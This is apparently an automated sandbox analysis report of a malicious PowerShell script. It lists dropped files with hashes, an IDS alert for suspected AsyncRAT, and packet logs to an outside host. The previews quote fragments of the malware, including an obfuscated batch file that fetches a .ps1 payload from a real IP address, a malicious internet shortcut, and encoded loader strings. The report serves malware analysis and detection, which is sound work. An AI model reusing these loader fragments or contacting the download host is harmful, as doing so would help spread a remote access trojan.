                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):6221
                                                                  Entropy (8bit):3.7297711936544697
                                                                  Encrypted:false
                                                                  SSDEEP:48:L+u5FoNLPr3C4U28KjVukvhkvklCywqmdLvrFl12SogZoZrvrFl12SogZo91:yDN33CxHK4kvhkvCCt1vrFfH2vrFfHq
                                                                  MD5:204776879017B07D423BCD7A66BCC0C0
                                                                  SHA1:1D82FF446EA8176215AA4F9CF56687F0E1B6E307
                                                                  SHA-256:26F5825D4F9EFE25349DE8B30014C7237C67B29C1A4F167B2C394071BC87420C
                                                                  SHA-512:46B4B5C19CD7DCE092D0D707F52099799C0F6F974E25ED7E37E09BA4877F9164A31D92C70D9B02AA7ACFA86D74B6D28D634E32496B2C9305B4D255D431C52660
                                                                  Malicious:false
                                                                  Preview:...................................FL..................F.".. ...-/.v....iv.x!\..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....d.t!\.....x!\......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^!Z.=...........................%..A.p.p.D.a.t.a...B.V.1.....!Z.=..Roaming.@......CW.^!Z.=...........................`..R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`.............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^!Z.=....Q...........
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):6221
                                                                  Entropy (8bit):3.7297711936544697
                                                                  Encrypted:false
                                                                  SSDEEP:48:L+u5FoNLPr3C4U28KjVukvhkvklCywqmdLvrFl12SogZoZrvrFl12SogZo91:yDN33CxHK4kvhkvCCt1vrFfH2vrFfHq
                                                                  MD5:204776879017B07D423BCD7A66BCC0C0
                                                                  SHA1:1D82FF446EA8176215AA4F9CF56687F0E1B6E307
                                                                  SHA-256:26F5825D4F9EFE25349DE8B30014C7237C67B29C1A4F167B2C394071BC87420C
                                                                  SHA-512:46B4B5C19CD7DCE092D0D707F52099799C0F6F974E25ED7E37E09BA4877F9164A31D92C70D9B02AA7ACFA86D74B6D28D634E32496B2C9305B4D255D431C52660
                                                                  Malicious:false
                                                                  Preview:...................................FL..................F.".. ...-/.v....iv.x!\..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....d.t!\.....x!\......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^!Z.=...........................%..A.p.p.D.a.t.a...B.V.1.....!Z.=..Roaming.@......CW.^!Z.=...........................`..R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`.............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^!Z.=....Q...........
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:MS Windows 95 Internet shortcut text (URL=<file:///C:\Windows\Temp\Modules.bat>), ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):61
                                                                  Entropy (8bit):4.943215518587025
                                                                  Encrypted:false
                                                                  SSDEEP:3:HRAbABGQYm5sMsXBQJnHERyn:HRYFVmyMsXUV
                                                                  MD5:0647B2920DB31FB47F730F94F848E5B6
                                                                  SHA1:24A0653D8064DAF80F3BF0A68CB973D715D29E2D
                                                                  SHA-256:3AECC67A9BB8ABFA6F53E673BF06E41C024974642855AD0CDBE18A7F17B80A3B
                                                                  SHA-512:B969E57E4F8C3B6CA0E9EB5EF17108D6644A43D541F5DDAEA3B79F22F63610D3DEF86DCA88572D0B003D7A32412F9BDC354752CDBDC35174F40C7E72749D3D7F
                                                                  Malicious:true
                                                                  Preview:[InternetShortcut]..URL=file:///C:\Windows\Temp\Modules.bat..
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:Unicode text, UTF-8 text, with very long lines (672), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):3495
                                                                  Entropy (8bit):3.658140003339631
                                                                  Encrypted:false
                                                                  SSDEEP:24:wuuFrLntq+ojZlhiF5ovWUiF5l4T6n9HFECs+//t0nuMXvaaHisT0o0r:wRv0lhYivVYwy9/2u8PxS
                                                                  MD5:BB445D197063475C8D78DE4F0825753C
                                                                  SHA1:158A8E3B278AFFE7C1185AAD67683E4253CF53DD
                                                                  SHA-256:7066E4A496D83EE1B677ADE06C868A432BB4A0DD364B19EE184147A527B11C10
                                                                  SHA-512:173CD8A56E2FA6E8DB33BC13870F8751473251AA80BE2235321E62B0F84961E9FD00A236AEC63342D73F262DBC7C2A920951A1A8F41707CA6640E673F21C4307
                                                                  Malicious:true
                                                                  Preview:@%...%e%...%c%...%h%...%o%...% %...%o%...%f%...%f%...%..s%...%e%...%t%...%l%...%o%...%c%...%a%...%l%...%....s%...%e%...%t%...% %...%"%...%u%...%r%...%l%...%=%...%h%...%t%...%t%...%p%...%:%...%/%...%/%...%1%...%4%...%7%...%.%...%4%...%5%...%.%...%4%...%4%...%.%...%1%...%3%...%1%...%/%...%i%...%n%...%f%...%o%...%p%...%a%...%g%...%e%...%/%...%v%...%f%...%r%...%c%...%x%...%q%...%.%...%p%...%s%...%1%...%"%...%..s%...%e%...%t%...% %...%"%...%h%...%e%...%a%...%d%...%e%...%r%...%N%...%a%...%m%...%e%...%=%...%X%...%-%...%S%...%p%...%e%...%c%...%i%...%a%
                                                                  File type:ASCII text, with very long lines (1014), with CRLF line terminators
                                                                  Entropy (8bit):6.079504526220573
                                                                  TrID:
                                                                    File name:trwsfg.ps1
                                                                    File size:1'954 bytes
                                                                    MD5:22bae550672a11587c37ebb8dabeefef
                                                                    SHA1:5c7951317700fd35bbfd39499473889c752f9164
                                                                    SHA256:569775b523c853aa351d5832df2fdbb68fdaa8c05f9cc67289921f00a66c0157
                                                                    SHA512:03f9028156f1ba8f4ee62537ddba10c7f7d5ab0cee8cac17c1ae43c0c57922ed8a70d03b780142708afcae9b4eb46bb9b275e8b746061620681a57a27674e92a
                                                                    SSDEEP:48:r95cVCsQlPShJCeVrGSqQmVfbE7Qcx3XkzVtc3hx:rcMbSCS38VwX
                                                                    TLSH:5D41E83C7B35A2A144D345F1707AD78CC46046AB1118CE30B78A89D5BBF5188C2F8A4D
                                                                    File Content Preview:$fn9R = 'bTDL6BsFafl78ey7maEppR5Ma5PhKmjyJa2Vp9mFa3k='..$hNDv = 'uK5hJiV5DpuXl518tsh0DA=='..$Gvzu = 'FGqIKrghCtkMEQX/kQZKAqnqqz3Efc2XmlxbcU+AyYwRkQ+Gj9z/iPrGA9ShyQzSpLpORZ89I7gBA7jaAaufS814y5nQYCXjxJQq5qFZjGk42jcVv0d0PQqXwfH+3aDxNgeB5OJLCeffH/GPCVu9nVtl9s
                                                                    Icon Hash:3270d6baae77db44
                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2025-01-01T08:48:10.465456+01002842478ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)1157.20.182.1774449192.168.2.449733TCP
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jan 1, 2025 08:48:00.443474054 CET4973080192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:00.448383093 CET8049730147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:00.448456049 CET4973080192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:00.452387094 CET4973080192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:00.457247019 CET8049730147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:01.077001095 CET8049730147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:01.077017069 CET8049730147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:01.077047110 CET8049730147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:01.077058077 CET8049730147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:01.077075958 CET4973080192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:01.077116966 CET4973080192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:01.173935890 CET4973080192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:01.253868103 CET4973180192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:01.258793116 CET8049731147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:01.258863926 CET4973180192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:01.259046078 CET4973180192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:01.263848066 CET8049731147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:01.870188951 CET8049731147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:01.870206118 CET8049731147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:01.870292902 CET4973180192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:01.870641947 CET4973180192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:01.875679970 CET8049731147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:01.875726938 CET4973180192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:03.464159012 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:03.469150066 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:03.469204903 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:03.469403982 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:03.474173069 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.092248917 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.092267990 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.092278957 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.092308998 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:04.092333078 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.092344046 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.092363119 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.092375040 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.092380047 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:04.092401028 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:04.092612982 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.092623949 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.092634916 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.092653990 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:04.092673063 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:04.097613096 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.097625017 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.097635984 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.097666025 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:04.149566889 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:04.180701971 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.180728912 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.180741072 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.180764914 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:04.180814028 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.180860996 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:04.180958033 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.181014061 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.181030989 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.181050062 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:04.181241989 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.181286097 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.181299925 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.181303978 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:04.181329966 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:04.181451082 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.181828976 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.181863070 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:04.181885004 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.181895018 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.181934118 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:04.182041883 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.182053089 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.182080030 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:04.182681084 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.182749987 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.182760000 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.182790041 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:04.182856083 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.182892084 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:04.268388987 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:04.321438074 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.067584991 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.072468042 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.249610901 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.249641895 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.249654055 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.249774933 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.249785900 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.249797106 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.249802113 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.249829054 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.249854088 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.250041962 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.250052929 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.250094891 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.250133991 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.250231028 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.250273943 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.250289917 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.250300884 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.250354052 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.338422060 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.338438988 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.338452101 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.338546991 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.338586092 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.338598013 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.338625908 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.338727951 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.338737965 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.338761091 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.338799000 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.338809967 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.338834047 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.338995934 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.339006901 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.339026928 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.339183092 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.339215994 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.339226007 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.339236975 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.339267969 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.339390039 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.339402914 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.339413881 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.339445114 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.339821100 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.339859962 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.339893103 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.339904070 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.339937925 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.340054989 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.340101004 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.340111017 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.340121984 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.340143919 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.340173960 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.427544117 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.427557945 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.427568913 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.427618980 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.427629948 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.427735090 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.427743912 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.427743912 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.427757025 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.427768946 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.427797079 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.427815914 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.428062916 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.428174973 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.428185940 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.428216934 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.428270102 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.428303003 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.428339005 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.428349018 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.428384066 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.428541899 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.428553104 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.428561926 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.428580999 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.428884983 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.428894997 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.428905964 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.428920031 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.428941011 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.429052114 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.429064035 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.429074049 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.429085016 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.429107904 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.429138899 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.429356098 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.429367065 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.429377079 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.429409027 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.429850101 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.429861069 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.429872990 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.429884911 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.429924011 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.430037022 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.430052042 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.430063963 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.430074930 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.430098057 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.430124044 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.430252075 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.430605888 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.430617094 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.430627108 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.430644035 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.430670023 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.430809021 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.430819035 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.430834055 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.430845022 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.430860996 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.430881977 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.431088924 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.431098938 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.431109905 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.431126118 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.431525946 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.431535959 CET8049732147.45.44.131192.168.2.4
                                                                    Jan 1, 2025 08:48:05.431567907 CET4973280192.168.2.4147.45.44.131
                                                                    Jan 1, 2025 08:48:05.517868996 CET8049732147.45.44.131192.168.2.4
